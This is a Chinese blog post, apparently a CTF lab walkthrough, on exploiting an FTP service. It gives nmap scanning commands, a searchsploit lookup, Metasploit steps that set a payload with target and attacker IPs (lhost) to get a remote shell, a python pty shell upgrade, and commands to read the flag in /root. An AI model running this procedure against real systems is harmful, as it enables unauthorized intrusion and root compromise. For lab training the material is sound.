CTF夺旗-FTP服务后面利用 | 李青帝

LOADING

加载过慢请开启缓存 浏览器默认开启

CTF夺旗-FTP服务后面利用

image-20230924014344753

信息探测

扫描主机服务信息以及服务版本

nmap -sV 靶场IP地址

快速扫描主机全部信息

nmap -T4 -A -v 靶场IP地址

  • nmap:扫描工具
  • -T4:以最快速度扫描
  • -A:加载所有扫描模块进行扫描
  • -v:返回探测的所有详细信息(包括发送数据包,靶场响应数据包)

发现漏洞

分析nmap扫描结果,并对结果进行分析,挖掘可以利用的信息;

使用seachspliot,查看漏洞信息,找到可利用的溢出代码;

使用metasploit进行溢出

打开metasploit在终端中输入msfconsole

输入search对应的软件及版本号

使用exploit

use exploit

查看可以使用的payload

show payload

设置payload

set payload

设置参数

show options

set rhost 被攻击机IP

set lhost 攻击机IP

进行远程溢出

exploit

执行命令

id

优化shell

使用python pty开启终端

python -c "import pty;pty.spawn('/bin/bash')"

获取flag

一般情况下,靶场机器的flag值是存放在服务器的根目录下,/root/目录。

cd /root/

ls

cat flag

总结

对于开放FTP,SSH,Telnet等服务的系统,可以尝试一些对应服务版本的漏洞代码;

对于系统,一定要注意利用现成的EXP来root主机;